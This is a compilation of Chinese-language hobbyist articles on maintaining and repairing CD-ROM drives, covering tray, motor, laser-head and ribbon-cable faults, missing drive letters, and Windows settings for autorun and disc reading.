    光驱中一般有3个小电机，分别是控制进出盒仓的进出盒仓电机，固定光盘并进行旋转的主轴电机，使激光头沿光盘的半径方向运动的进给电机。光驱中最重要也是最脆弱的部件就是激光头，它实际上是一个整体，由激光管、聚焦线圈、光学镜片等部件组成，外观上看起来像一个黑色的方形盒子。只要你拆开光驱，就能看到一个蓝色或透明的小圆片，这就是激光头的物镜部分，找到物镜后就等于找到了激光头。
    一、开机检测不到光驱或者检测失败
    可能原因及排除：
    1.光驱IDE接口插接不良——重新插好、插紧。
    2.硬盘数据线由于鼠咬、虫蛀等原因损毁——更换。
    3.跳线错误——重跳。
    二、进出盒故障（不能进出盒或者进出盒不顺畅）
    可能原因及排除：
    1.进出盒仓电机插针接触不良或电机烧毁——重插或更换。
    2.进出盒机械结构中的传动带（橡皮圈）松动打滑——更换尺寸小一些的传动带。
    三、进给电机故障
    故障现象：
    出入盒正常，但放入光盘后光驱作几次加速读盘动作（也可以从声音上判断出来），然后一直高速旋转读盘，但仍读不出信息。
    可能原因及排除：
    进给电机插针接触不良或者是电机烧毁——重插或更换。
    四、激光头故障
    故障现象：
    挑盘（有的盘能读，有的盘不能读）或者读盘能力差。
    可能原因及排除：
    光驱使用时间长或常用于看VCD或听CD，使激光头物镜变脏或老化——用棉花醮无水酒精清洗可改善读盘能力，而对于激光头老化则可调节激光电路上的可调电阻以增大激光的发射功率。
    另外敬告大家千万不要使用市面上销售的一些低价劣质光头清洁盘，因为这些盘的刷毛太硬，反而会刮花物镜，并且还有可能引起静电危害，甚至缩短光驱使用寿命。
    五、激光信号通路故障
    激光信号通路故障指的是激光头与电路板之间的连接线，一般为一条扁平硬直的塑料导线，它是激光与其他电路信息交换的通道。此处产生的故障较多，但维修却很简单，只要把这条导线换一条就可以了。
    1.加电后，指示灯闪动约10秒后停止，按出盒键，盒能伸出，但放入盘片后又马上被弹出；
    2.加电后，指示灯闪动约2至3秒后停止，出入盒正常，盘片入盒后，旋转一下就停止，读不出数据；
    3.放入盘片后，指示灯快速闪动不停，但读不出数据来；
    4.放入盘片后，光驱作几次加速动作，尝试读出数据（由声音也可辨别出），稍后停止，读不出数据。由于机型不同可能尝试读盘的次数不同。
    六、主轴信号通路故障
    一般情况下，主轴电机与其驱动电路是合二为一的，我们把它称为主轴信号通路，此电路也由一条与激光信号通路连线一样的连接线连接，只不过股数不一样罢了。由于它与激光头信息通路都是由伺服电路进行信息沟通的，因而，在故障现象上有许多相似的地方，但由于激光头信息通路在进出盒时，其连接线易被拉折而损坏，所以在遇到相同故障现象时应先考虑激光头信息通路故障，再考虑主轴信号通路故障。在此，我只把该电路出现的一些特殊现象罗列出来供大家参考。
    1.加电后指示灯闪动不止，但盘片不转；
    2.读盘加速的声音和振动特别大，重复几次后停止，但读不出数据。
    市面上各种光驱牌子和型号太多了，说不定有的激光信号通路和主轴信号通路共用一条连接线，但万变不离其宗，故障也是这么维修。


光驱日常维护及故障维修

《一键清理系统垃圾》

光驱日常维护及故障维修

在电脑的各部件中，光驱是属于易损耗的产品之一，其它部件也许用上六七年都还能正常使用（就是更新换代跟不上了），但光驱多则两三年，少则不到一年就不能用了。并且出问题的光驱维修起来也是比较麻烦的，送回厂家维修，也许还不如买一个新的，自己或许对此又无能为力。这里结合自己平时的一些使用和维修经验，谈谈光驱的维护及常见的一些故障的维修方法，以作参考。

    1、光驱的日常维护

    1.1 对光盘的选择

    在选用光盘时，应尽量挑光盘面光洁度好、无划痕的盘，并且对盘的厚度也须加注意。质量好的盘通常会稍厚一些；而质量差的盘比较薄，使光驱加紧机构运转很吃力。质量不好的光盘，如盘片变形、表面严重划伤、污染以及盗版光盘等，在光驱内进行读取时，光学拾取头的物镜将不断地上下跳动和左右摆动，以保证激光束在高低不平和左右偏摆的信息轨迹上实现正确聚集和寻道，加重了系统的负担，加快了机械磨损。同时，为了减少光驱的磨损，延长光驱的使用寿命，不要经常用光驱来长时间播放VCD影碟，因为这样， 电机与激光头就增加了工作时间，从而缩短了光驱的使用寿命。另外在关机时，如果劣质光盘留在离激光头很近的地方，那当电机转起来后很容易划伤光头。

    1.2 光驱的入盒和出盒

    尽量将光盘放在光驱拖架中，有一些光驱托盘很浅，若光盘未放好就进盒，易造成光驱门机械错齿卡死。同时进盘时不要用手推光驱门，应使用面板上的进出盒键，以免入盘机构齿轮错位。
    在不使用光驱时，应尽量取出光盘，因为光驱只要其中有光盘，主轴电机就会不停地旋转，光头不停地寻迹、对焦，这样会加快其机械磨损，使光电管老化。
不要在光驱读盘时强行退盘，因这时主轴电机还在高速转动，而激光头组件还未复位。一方面会划伤光盘；另一方面还会打花激光头聚焦透镜及造成透镜移位。应待光驱灯熄灭后再按出盒键退盘。

    1.3 保证光驱的通风良好

    众所周知，现在高倍速光驱的转速极快，几乎赶超了硬盘，所带来的最大弊端就是发热量极大。对于现在市场上大部分以塑料为机芯的CDROM来说，高热量是降低其寿命的重要因素，因为塑料的耐热能力较差，长期使用自然会出现问题造成读盘不顺利。但光驱的机芯又很难像显卡或CPU那样依靠散热片和风扇来散热，因此高发热问题必须引起人们的重视。因此我们要把光驱放在一个通风良好的地方，来保持它具有良好的散热性，以便保证光驱能够稳定运行。
    当然，日常维护还有其它很多方面，一定要养成正确的使用和保养方法，才能让光驱的寿命最大化。对于一些经常使用的光盘，如果硬盘比较空闲的用户，最好把它制作成虚拟光驱文件。要养成定期清洁激光头的习惯。

    2、光驱的常见故障

    光驱的平均无故障时间为2500小时左右，正常使用寿命一般为二年左右，当然这要看光驱的实际使用时间。时间久了，光驱常会出现不读盘的故障，一般均显示为：“驱动器X没有光盘，插入光盘再试”或“CDR101：NOT READY READING DRIVE X ABORT,RETRY,FAIL?”。光驱由机械部件、电子部件和光学部件三类部件组成，在使用、维护时较普通软盘驱动器、硬盘复杂，且故障率较高，故障的分析、定位也较复杂。对光驱进行排查故障的一般过程是先检查和排除与光驱相连的各信号线、电源线等；其次排除上述“其它故障”中的各个方面；然后检查系统配置及参数设置情况；再考查光学部件、机械部件因素，最后考查电子部件故障。
    光驱的故障按故障源一般有接口故障、系统配置故障、光学故障、机械故障、电子故障和其它故障六大类。

    2.1 接口故障

    此类故障主要原因有：光驱的接口与主板接口不匹配（出现CDR-103错误提示），在增加或减少新硬件时，造成光驱的信号线（包括与其它多媒体部件的连接线）、电源线、跳线等之间的松动、错误连接或断线等等。这类故障的具体现象有“不认”光驱、“读写”错误、主机死机等等。

    2.2 系统配置故障

    此类故障的主要原因有：系统增加了新硬件后I/O、DMA和IRQ有冲突；CMOS中有关CDROM的设置不当；与硬盘的主从关系设置有误等。具体现象有光驱不工作、光驱灯亮一段时间后死机、“读写”错误、不出现盘符或误报多个盘符等。
    例如：一台电脑加装一个6倍速的光驱，是与1.2GB的硬盘共用Primary IDE接口，使用一段时间后，按主板说明将光驱接到Secondary IDE接口上后，发现光驱不能工作了。
    分析与处理过程：由于光驱接在Primary IDE口时工作正常，故可以排除光驱自身的问题，考虑到CMOS BIOS在改变插口后未设置，怀疑BIOS的设置对光驱可能有影响，开机进入BIOS设置，发现其中的IDE Drive1项设为None，于是将IDE Drive1项改为缺省值AUTO后，再开机，光驱能够正常工作。

    2.3 光学部件故障

    此类故障的主要原因有激光二极管和光电接收二极管老化、失效；光头聚焦性能变差，激光不能正常聚焦到光盘上；信号接收单元不能正常接收信号；激光头表面和聚焦镜表面积尘太多，激光强度减弱等。具体现象是放入光盘后无反映、读取光盘上数据困难、读取时间变长、“读写”错误、“不认”光盘、“挑盘”、“死机”、提示“CDR-101”或“CDR-103”错误信息等。
    CDROM光头使用寿命一般在2000～3000小时。随着使用时间的增长，光头功率逐渐下降，通过调整光头调节器以增大光头功率的方法，可改善其读盘能力，但这会加速光头的老化，减少光头的使用寿命。
    例如一台高仕达16倍速光驱，使用了半年后，发现原来一直能够正常使用的光盘，绝大部分读不出来，并显示“CDR-101”错误。如果反复按“R”键再试，则可读出一些信息。为了定位故障所在，我们先在光驱内放一张CD盘，发现能将整盘从头到尾播放完。由此排除了光驱的寻道和步进电机等机械部分、电子部件的故障，判定很有可能是激光头故障，导致不能正确读出光盘上的信号。于是将光驱拆开，使激光头露出来，用干净丝绸缠在小木棍上，沾上少许无水酒精轻轻擦拭激光头表面，然后，置于干净环境中晾干，再把各部件按序装好，装回计算机，开机测试，发现光盘工作正常，故障消失。这是一种典型的光学部件故障。

    2.4 机械部件故障的分析与定位

    此类故障的主要原因有机械部件磨损、损坏产生位移等现象导致激光头定位不准；压盘机械部分有纰漏，不能加紧光盘，导致盘片转动失常。具体现象有托盘不能弹出、“挑盘”、“不认盘”、“读写”错误等，多出现在经常非法、强制操作，或环境较恶劣的情况下。对于这类故障，可将CDROM机械部分重新进行装配，适当补偿部件磨损，调整机构运动精度，在压盘轴孔处加装垫片等维修方法。

    2.5 电子部件故障

    此类故障较为少见，其主要原因有光驱电子线路板损坏、电子元件老化、损坏等。具体现象有光驱不工作、不能出现盘符、“读写”错误等等。
出现此类故障一般要送回厂家维修点或专业维修店维修。具体是要更换相应的电路板或元器件。

    2.6 其它故障

    此类故障的主要原因有环境因素、设备驱动程序问题（出现CDR-101：Bead Fail提示信息）、CDROM盘有灰尘、划痕、不正确的操作、固定螺丝太长、维修不当的残余物或上述诸故障的综合等等。

    3、光驱的维修基本操作方法

    光驱读盘不出的硬件故障主要集中在激光头组件上，且可分为二种情况：一种是使用太久造成激光管老化；另一种是光电管表面太脏或激光管透镜太脏及位移变形。所以在对激光管功率进行调整时，还需对光电管和激光管透镜进行清洗。

    3.1 光电管及聚焦透镜的清洗。

    拔掉连接激光头组件的一组扁平电缆，记住方向，拆开激光头组件。这时能看到护套罩着激光头聚焦透镜，去掉护套后会发现聚焦透镜由四根细铜丝连接到聚焦、寻迹线圈上，光电管组件安装在透镜正下方的小孔中。用细铁丝包上棉花沾少量蒸馏水擦拭（不可用酒精擦拭光电管和聚焦透镜表面），并看看透镜是否水平悬空正对激光管，否则须适当调整。至此，清洗工作完毕。

    3.2 调整激光头功率。

    在激光头组件的侧面有1个像十字螺钉的小电位器。用色笔记下其初始位置，一般先顺时针旋转5°～10°，装机试机不行再逆时针旋转5°～10°，直到能顺利读盘。注意切不可旋转太多，以免功率太大而烧毁光电管。
    按照上述拆卸步骤由里到外依次装好，开机后应该一切正常。经这样处理后的光驱一般都能正常工作。


光驱特殊维修

《一键清理系统垃圾》

光驱特殊维修

    近日，从朋友那里得到一个旧光驱，除了读盘能力不佳外，没有其他损坏。于是拿回来略加“整顿”，让其发挥一下余热，也算废物利用了。
        修旧光驱无非是调节激光头的功率或更换新的激光头，从成本考虑，当然首选前者。经过反复拆装和调节，就在即将大功告成的时候，出现了意想不到的问题。激光头在搜索光盘时不停地震动，声音就像打字机一样。我的心顿时凉了一半，从来没有遇到过这种情况，想想自己的维修操作也来没什么不对的地方，一时竟摸不着头脑。就这样放弃吗？这可不是DIY的精神。于是抱着不救活光驱决不罢休的决心，又把光驱里里外外检查了一遍。不经意间发现，连接电路板与激光头的印刷软排线（就是用于传输数据或控制激光头的机械运动的数据线）撕裂了一个小口子，有三条印刷线断了，于是肯定故障的原因就在这里。可是，印刷的铜线非常细，且又被塑封了，用一般的方法很难焊接。DIY爱好者总有解决的办法，《电脑报》上曾经刊登过一篇关于如何用铅笔改变Duron倍频的文章，受其启发，决定用此方法试一试。
        先把铜线断裂处两端的塑封用小刀轻轻刮去（只需刮一面），不要刮得太深，能看见铜线的金属光泽就行了。然后找一小块较硬的塑料片，大小以能盖住断裂处裂纹为宜，用502胶水将其粘在断裂面的背面（即露出铜线那一面的反面），以固定裂面，防止裂缝错位。
        粘贴时要注意将断开的铜线对齐，尽量让铜线贴合得紧一些，以保证连接后的稳定性。接着就是最关键的一步了──连接。找一支铅笔，最好是硬一点的，笔者用的是H的，因为太软的铅笔不容易削尖，而且容易断头，铅笔头削得越细，连接的精度就越高，成功率也就越高。然后就看你的耐心了，小心地用铅笔在刮开的铜线之间来回划写，用力要轻，笔头变钝时要立即削尖。划写的程度以能看见铅笔石墨的反光为准，当然，划得越深连接就越可靠，但要小心不要把并列的两条铜线导通了，否则就只能擦掉重来了。连好三条铜线后，接下来就是测试了，接好电源和数据线，开机，光驱指示灯亮了，放入光盘，读出来了！终于心血没有白费，光驱总算是救活了。
        这样的光驱故障一般很难遇到，在这里只是提供了一种维修的思路，希望其他玩家能从中得到一点启发。


光驱托盘不能弹出的故障解决

《一键清理系统垃圾》

光驱托盘不能弹出的故障解决

笔者使用的是SONY 52×的CD-ROM光驱，近日光驱罢工，表现为光驱托盘弹不出来，在此之前也出现过类似的问题，但只要过一段时间就能使用，当时以为是软件的问题，也没有在意，但这次不同，按下弹出键只能听到光驱里面有“咔嗒、咔嗒”的声音，托盘死活都不出来，用铁丝伸入紧急弹出孔捅也不行。因急用，只好将挡尘板拆下，露出里面的传动齿轮，使用时用针捅里面的齿轮，托盘出来一点后再用手将它拉出。

    于是笔者干脆把光驱拆开，仔细观察发现传动齿轮有些磨损，这些磨损的齿轮会不会是引起故障的元凶呢？因一时找不到合适的齿轮更换无法证实，只好加点机油增加润滑。无意中碰到传动皮带，感觉皮带有些松弛，就想先把皮带紧紧再说，于是把传动皮带取下后在松香粉中滚了一下，使皮带上沾满松香粉末以增加摩擦力。

    因找不到合适的齿轮，只好先将光驱装好另想办法，没想到装好后实验时托盘居然能弹出来了，经反复多次实验，故障消除。看来光驱托盘不能弹出是传动皮带松弛的原因，而传动齿轮只要不是磨损得特别严重，对托盘的弹进弹出影响不大。

    解决此问题的关键就是更换传动皮带，但在市场上找不到合适的传动皮带，怎么办呢？笔者找来一些缝衣服的线，在电机的皮带轮上缠了几圈，另外在皮带上再涂一些松香粉以增大摩擦力。装好后一直使用至今，没出现任何问题。


光驱维修一法

《一键清理系统垃圾》

光驱维修一法

朋友一光驱，使用一直正常。一次因给另一朋友试机而取出光驱，重新装好后不能读盘。表现为指示灯亮，进出仓正常，但就是不读盘。

    开始以为是数据线未插好之故，重插多次后还是不行。没法，取出光驱，放在机箱外接好电源、数据线后却能读盘了。装入机箱后又不能读盘。取出后又一切正常。试了多次都是如此。怀疑是机箱问题，经仔细检查，排除是机箱故障问题。百思不得其解。

    取出光驱拆开，拿在手上翻来覆去地看，没发现有什么问题。本着DIY的精神和自己对电子知识的皮毛之功，仔细地寻找着蛛丝马迹。一次轻轻地摇了摇电源D型插，发觉有点不正常，好像有点响声，仔细一看并无断裂痕迹。再一摇，还是有点响，于是用镊子一个脚一个脚地挑，最后在接黄线的那一脚上发现松动现象。用表一测，果然是它断了。这一断脚断得可真绝，锡点外面完好，根本看不出来，是锡点里面断了，一摇就能听见响声，如果不仔细地摇或用表测根本就看不出来。 问题找到了，当然就好解决了。于是插上烙铁一下搞定。装入机箱，接好电源，数据线，放入光盘，一切正常。

    分析： 原来朋友的机箱是卧式的，装入光驱后再插电源时有一个由上往下的力，这样就使可能早已断了的脚被挤开。断的脚是黄线，它提供的是12V的电压，由于中断导致了光驱工作不正常。至于托盘可以正常进出，应当是因为托盘的电机使用的是电源供给的5V电，而并非12V，所以没有受到什么影响。


光驱延寿十法

《一键清理系统垃圾》

光驱延寿十法

   家用电脑、CD、VCD、超级VCD以及现在的DVD都装有光盘驱动器，人们称之为光驱。而光驱是一个非常娇贵的部件，它的寿命确实有限。因此，很多商家对光驱部件只保修三个月，而其它部件均可保修一年以上或终身保修。影响光驱寿命的主要是激光头，激光头的寿命实际上就是光驱的寿命。延长光驱的使用寿命，具体有以下十法：
#1　　一、保持光驱、光盘清洁
    光驱采用了非常精密的光学部件，而光学部件最怕的是灰尘污染。灰尘来自于光盘的装入、退出的整个过程，光盘是否清洁对光驱的寿命也直接相关。所以，光盘在装入光驱前应作必要的清洁，对不使用的光盘要妥善保管，以防灰尘污染。
#1　　二、定期清洗保养激光头
    光驱使用一段时间之后，激光头必然要染上灰尘，从而使光驱的读盘能力下降。具体表现为读盘速度减慢，显示屏画面和声音出现马赛克或停顿，严重时可听到光驱频繁读取光盘的声音。这些现象对激光头和驱动电机及其它部件都有损害。所以，使用者要定期对光驱进行清洁保养或请专业人员维护。
#1　　三、保持光驱水平放置
    在机器使用过程中，光驱要保持水平放置。其原因是光盘在旋转时重心因不平衡而发生变化，轻微时可使读盘能力下降，严重时可能损坏激光头。有些人使用电脑光驱在不同的机器上安装软件，常把光驱拆下拿来拿去，甚至随身携带，这对光驱损害很大。其危害是光驱内的光学部件、激光头因受振动和倾斜放置发生变化，导致光驱性能下降。
#1　　四、养成关机前及时取盘的习惯
    光驱中一旦有光盘，不仅计算机启动时要有很长的读盘时间，而且光盘也将一直处于高速旋转状态。这样既增加了激光头的工作时间，也使光驱内的电机及传动部件处于磨损状态，无形中缩短了光驱的寿命。建议使用者要养成关机前及时从光驱中取出光盘的习惯。
#1　　五、减少光驱工作时间
    为了减少光驱的使用时间，以延长其寿命。使用电脑的用户在硬盘空间允许的情况下，可把经常使用的光盘内容做成虚拟光盘存放到硬盘上。如教学软件、游戏软件等存放到硬盘中，这样以后可直接在硬盘上运行，并且具有速度快的特点。
#1　　六、少用盗版光盘，多用正版光盘
    不少用户因盗版光盘价格与正版光盘价格有一定差距，加上光盘内容丰富而购买使用，其实用户大为吃亏。因为你的光驱长期读取盗版光盘，因其盘片质量差，激光头需要多次重复读取数据。这样电机与激光头增加了工作时间，从而缩短了光驱的使用寿命。而正版光盘虽价格高点，但光驱读盘有了保障。所以建议用户少用盗版光盘多用正版光盘。
#1　　七、正确开、关盘盒
    无论哪种光驱，前面板上都有出盒与关盒按键，利用此按键是常规的正确开、关光驱盘盒的方法。按键时手指不能用力过猛，以防按键失控。有些用户习惯用手直接推回盘盒，这对光盘的传动齿轮是一种损害，建议用户克服这一不良习惯。
#1　　八、利用程序进行开、关盘盒
    利用程序进行开、关盘盒，在很多软件或多媒体播放工具中都有这样的功能。如在Win 95系统中用鼠标右键单击光驱盘符，其弹出的菜单中也有一项“弹出”命令，可以弹出光盘盒。建议电脑用户尽量使用软件控制开、关盘盒，这样可减少光驱故障发生率。
#1　　九、谨慎小心维修
    由于光驱内所有部件都非常精密，用户在拆开及安装光驱的过程中一定要注意方式或方法，注意记录原来的固定位置。如果你没有把握的话，可请专业维修人员拆装或维修，特别是激光头老化，需调整驱动电源来提高激光管功率时，一定要请专业维修人员调试，以防自己调整过大，使得激光头烧坏。
#1　　十、尽量少放影碟
    无论用户使用哪一种机型播放影碟，都要尽量控制播放时间，以免光驱长时间工作。特别是多媒体电脑，因长时间光驱连续频繁读盘，对光驱寿命影响甚大。用户需要经常放的节目，最好还是将其拷入硬盘，以确保光驱长寿。


光驱与光盘故障问答

《一键清理系统垃圾》

光驱与光盘故障问答

问：我光驱找不到了，打开设备管理器，IDE ATA/ATAPI控制器__SCSI/和RAID控制器__SCSI/RAID HOST CONTROLLER有问题，请问怎么办？

    答：在安全模式下御掉部分系统组件，重启选择进入普通模式，重新加载。如果还不行打开机箱检查一下数据线和电源线是否正常。

    问：刚开始是用的daemon tools，就有了一个虚拟光驱，现在我用了魔术师，又生成了一个光驱，以前的虚拟光驱还在，我该怎么把那个光驱删掉？

    答：右键Daemon tool的图标->"vitual cd/dvd rom"->"set number of device"->"disable"就可以了，最后把Daemon tool卸载，如果不行可以重新安装一下Daemon tool再重复上面的操作。

    问：新装的电脑，2000系统，大白鲨52X光驱，经常丢失光驱，象U盘那样出现类似“你可以安全拔掉该设备”的提示？

    答：重启后，正常，但稍后还会丢失，数据线换过后仍然不行，新换一个同型号光驱后，好了2天，故障依旧，最后换成源兴52X的不同品牌的光驱，就一切正常了，可能是硬件上存在不兼容现象。

    问：我想安装98或者me，但是进入dos之后，却发现在dos下不能用光驱！为什么？怎么解决？

    答：可以用windows98系统制作一个启动盘，用软盘启动或者直接用带光驱驱动的光盘启动即可。

    问：在WIN 98系统中，可否简单地屏蔽光驱？徜若在设备管理器中卸载了光驱，呆会要用岂不又得重装？

答：可以在设备管理器中把光驱禁用，或者在CMOS里把光驱的IDE选项设置为“not installed”。


解决光驱出盒困难

《一键清理系统垃圾》

解决光驱出盒困难

    一天，朋友送来一只华硕40×光驱，这光驱一直用得好好的，读盘很不错，但最近不知道为什么，先是出盒困难，到现在托盘已经无法出来了。从光驱应急出盒孔也无法把光驱托盘打开。
    给光驱接上电源，按光驱出盒键，听见光驱里面有轻轻的响声，感觉有出盒动作，但托盘就是伸不出来。看来是机械上的问题。
    卸下光驱底板上的螺丝，可以看到光驱的电路板，但无法把光驱机芯从里面拿出来，因为必须先卸下光驱面板，而要卸下面板，就得先卸下光盘托的前挡板。托盘不伸出来，挡板无法卸下。取一别针扳直，从应急出盒孔伸进去，用力往前推，感觉阻力比正常光驱要大，缓缓加力，托盘终于伸了一点出来，再用手拉动托盘，可以推进和拉出。将托盘前挡板向上用力扳，卸下挡板，再用起子顶面板的三个扣（见^38030204a^1），卸下面板，就可以将机芯完全拿出来了。机芯结构如^38030204b^2所示。
    将机芯拿在手上，接上电源，按出盒键，托盘还是无法伸出，从托盘下面的缝隙里仔细看出盒电机，发现电机皮带轮和皮带之间在打滑。卸下光驱上压盘片的支架的两个螺丝钉，取下上支架。用别针顶出托盘，因为已经下掉了上支架，所以托盘就可以全部抽出来，露出进出盒电机和齿轮，发现皮带果然有点儿松，换上一根合适的新皮带，装上托盘，通电试机，按出盒键，可以出盒。满以为解决了问题，装好上支架，想放张CD试试，按出盒键，机芯动了一下，托盘还是不能伸出来。将上支架拿下再试，又可以出盒了，但只要装上上支架，就无法出盒。试着放上一张光盘，再装上支架，按出盒键，居然可以正常出盒了，试了几次，都可以正常出盒，但是如果不在托盘里放张光盘，托盘就无法伸出。出不来盒的时候，看皮带也没有打滑的现象，但是电机微微振动，就是无法运转。试着用起子从托盘下面伸进去推动齿轮转动，先是感觉阻力较大，托盘伸出来一点儿后，阻力便很小了。
    观察各滑动的部位都有润滑脂，没有什么问题。但为什么阻力这么大呢，仔细观察并用起子推动齿轮，终于发现问题所在。先不讲是什么问题，这里我先讲讲机芯托盘进出盒的原理和过程，假设现在处在开盒状态，按进出盒键，进出盒电机运转，齿轮带动托盘往里运动，当托盘收进去后还差一点儿到位时，托盘背的滑槽带动一滑动组件，将此组件上的齿轮挂上进出盒的齿轮上，进而带动此组件运动，此组件又带动光盘主轴电机和光头部分向上运动，光盘主轴电机上的光盘托架配合上面的压盘组件夹紧光盘，完成进盒动作。当出盒时，电机反向运转，带动托盘向外伸出，同时带动滑动组件，使光盘主机电机部分与上压盘组件分离并向下运动，完成出盒动作。但问题就出光盘主机电机部分与上压盘组件分离这个地方。本来出盒时，滑动组件要带动主轴电机部分向下运动，并与上压盘组件分离，但此时主轴电机上托盘上的超强磁铁紧紧吸住上压盘片，使进出盒电机无法带动滑动组件。
    主轴电机上的托盘与上压盘组件的结构如^38030204c^3所示，当放入当光盘后，主轴电机托盘中的超强磁铁紧紧吸住上压盘组件（因为上压盘组件中有一圆铁片），这样就将光盘紧紧夹在主轴电机托盘上，在主轴电机带动光盘高速运转时，也不会打滑。当没有放入光盘时，上压盘片与主轴电机托盘直接吸合，此时超强磁铁与圆铁片之间只有很小的缝隙，因超强磁铁的磁性非常之强，它吸住上压盘片，想分开它们，是需要很大的力量，以至于给出盒机构带来很大的阻力，这样如果机芯其它部分性能稍有下降，如：皮带松了，润滑不良，电机转矩力变小了，便造成光驱无法出盒的故障。当光驱中有光盘时，超强磁铁与圆铁片之间的距离增加了，阻力也就变小了，出盒就容易一些。这样只要增加超强磁铁与铁片之间的距离，就可以解决问题了。
    上压盘片是由上下两部分紧扣在一起组成，分开上下两部分，里面就是一个圆铁片，将一张不干胶商标纸贴在铁片上，剪掉多余的部分，再将铁片有纸的一面朝下，再照原样装好，再试机，不放光盘也可以出盒了，但出盒时还有点儿不顺畅，再往铁片上贴一层，出盒就变得顺畅多了，装好光驱的外壳，完成了修复工作。这里增加的厚度相对于没有放光盘时超强磁铁与圆铁片之间的距离来说比较大，使出盒阻力大大减小，而增加的厚度相对于光盘的厚度来说是很小的，所以在放入光盘后也不用担心磁铁会夹不紧光盘而影响读盘性能。


光驱读盘不正常

《一键清理系统垃圾》

光驱读盘不正常

    问：我的电脑安装的是Windows XP操作系统，安装好后出现了一个问题，就是不能连续读光盘，插入第一张光盘一切正常，打开光驱放入第二张光盘，发现里边的内容竟是第一张光盘的内容，重新启动机器后，第二张光盘也能正常读出，这是什么原因？

    答：用鼠标右键点击“我的电脑”，选“管理”，选择“存储→可移动存储→库”，点击光驱所在的盘符，在名称项目中点鼠标右键选“属性”，在“延迟卸除”下有一项为“收回不可装入的媒体”，将它的时间改为0，应该可以解决这个问题。如果问题未能解决，则打开注册表编辑器，找到HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E965-E325-11CE-BFC1-08002BE10318}键值，将下面的UpperFilters 和LowerFilters删除，重启机器即可。


禁止光盘自动运行

《一键清理系统垃圾》

禁止光盘自动运行

Win 98：
依次打开“开始→设置→控制面板→系统→设备管理”，点击“CD-ROM”，选择光驱的型号，然后选择“属性→设置”，将“自动插入通告”前的钩取消，最后点“确定”并重新启动计算机即可。

Win 2000：
与Win 98不同，在Win 2000中，禁止光盘自动运行需要通过修改注册表来实现：在“运行”中输入“regedit”，打开“注册表编辑器”，选择“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom”，将“Autorun”项的值改为0即可。在Win 2000下禁用自动播放功能的方法是：在“运行”中输入“gpedit.msc”，打开“组策略编辑器”，依次点击“本地计算机策略→计算机配制→管理模板→系统”，双击右方策略窗口中的“停用自动播放”，在打开的窗口中选择“启用”复选框，并且在“停用自动播放”下拉菜单中选择“CD-ROM 驱动器”，确定后重新启动计算机即可。

Win XP：
在Win XP里进行禁用操作比较方便。右键单击“我的电脑”里的光盘图标，选择“属性”，在弹出的窗体中选择“自动播放”选项卡，在这里用户可以针对“音乐文件”、“图片”、“视频文件”、“混合内容”和“音乐CD”五类内容设置不同的操作方式，都选用“不执行操作”即可禁用自动运行功能，“确定”后设置立即生效。


经典故障 光驱丢失的原因分析及解决办法

《一键清理系统垃圾》

经典故障 光驱丢失的原因分析及解决办法

    目前光驱已经成为电脑的必备设备，几乎每一台电脑上都安装了光驱，没有光驱我们的电脑几乎没法正常工作了，不能看电影，不能听音乐，也不能玩游戏。不过在我们自己装机或者给朋友装机或升级时，有时会遇到机子装好后光驱的盘符却没有了，装系统，换数据线，查CMOS设置，最后费尽了办法才终于把它找回来。

    在我自己搞电脑装机和维修过程中，对于光驱盘符的丢失，我分析和总结了一些原因和规律，写出来供大家参考。光驱的丢失多数时候是我们自己在安装了新的软件或者新的驱动程序后出现的，也可能是我们无意中修改了CMOS设置或者CONFIG.SYS配置，还有原因是机器感染了病毒等等。

    硬件方面的原因

    1、数据线接反或者数据线损坏

    有时候只是个小毛病，但却会绕一个大圈，这说明要解决问题必须心细，有敏锐的观察力。在光驱丢失时，应首先检查一下光驱的数据线是否接反了(红红相对)，是否有松动。如果在确定其他地方没有问题时，并且光驱的数据线经常移动，这时应该更换一条数据线试一试。

    2、跳线设置与硬盘有冲突

    当光驱的跳线和在同一条数据线上连接的硬盘相同时就会出现找不到光驱(也可能没有硬盘)，这时只要将光驱的跳线跳成和硬盘不一样即可。为了提高数据传输率，最好将硬盘和光驱分开在两个IDE接口上。

    3、电源线故障，缺少+5V电压或+5V电压供电不正常

    这种情况不多出现。由于我们在拆装光驱或者硬盘时用力过大，使电源的D型插头松动或者由于电脑工作环境的恶劣插头氧化生锈，光驱的电源供给不是很正常(如果是硬盘这是硬盘的读盘声音会异常，并且硬盘表面有大量坏道出现)，光驱便也发现不了。

    有一次，给客户的IBM电脑主机升级，加装一个光驱。谁知道一个新的40X光驱装上后无论如何电脑也找它不着。光驱出盒正常，也根本想不到是电源的事，只想软件方面的事了。最后实在没着了，拿起万用表一测电压，没有+5V电压。最后一检查电源线，发现由于的多次拆卸中，+5V的红线已经断了，但在外面却还看不出来。一点小问题却费了老大的劲。

    4、IDE接口损坏

    如果是突然出现光驱的盘符丢失，无法使用光驱，这时我们可以把光驱和硬盘的接口互换一下。如果再次启动后发现能够找到光驱，但却找不到硬盘，这说明是原来接光驱的IDE接口损坏了；如果互换后电脑能够正常启动，但仍旧没有光驱，这说明是光驱自身的原因，造成的光驱盘符丢失，这时只能更换光驱。反正现在一个光驱没有几个钱。

    如果在WINDOWS下没有光驱，我们还可以在DOS(重新启动电脑后按F8进DOS，面非WIN98下的DOS)下用WIN98的万能光驱驱动来试着加载光驱，如果能够加载成功，说明是软件方面的原因，应主要从软件方面查找原因。否则就应从硬件方面来考虑。

    老的486机子没有多余的IDE接口如何装光驱：虽说电脑已经到了奔IV了，但有不少486还在发挥着余热。由于有一部分486机子主板上没有集成IDE接口，硬盘和软驱及串口是有多功能卡提供的，也有的在主板上集成。在没有多余IDE接口的情况下加装光驱，是挺费劲的。如果再加装一块多功能卡，单单软驱接口，串口、并口的地址冲突就够你忙上好一阵子的，更何况多功能卡一般还不支持ATAPI协议，也就是说你即使添加了两块多功能卡，但光驱还是装不上的。不知道您还记得不，老的ISA声卡，当时的厂家就是考虑到486机子上没有多余的IDE接口，为了挂接光驱方便，在声卡上留有光驱接口。这时你跑跑腿，到二手市场找一块旧的声卡就行了。在声卡的驱动程序里一般有设置光驱的选项，根据提示安装就行了。

    软件方面的原因

    1、IDE驱动程序安装错误或与某个驱动程序有冲突

    如果我们在安装WIN98或者95时没有将IDE驱动程序正确安装，或者在安装后当你打开设备管理器查看“硬盘控制器“时发现其中有黄色叹号时，这时光驱的盘符就可能找不到了。

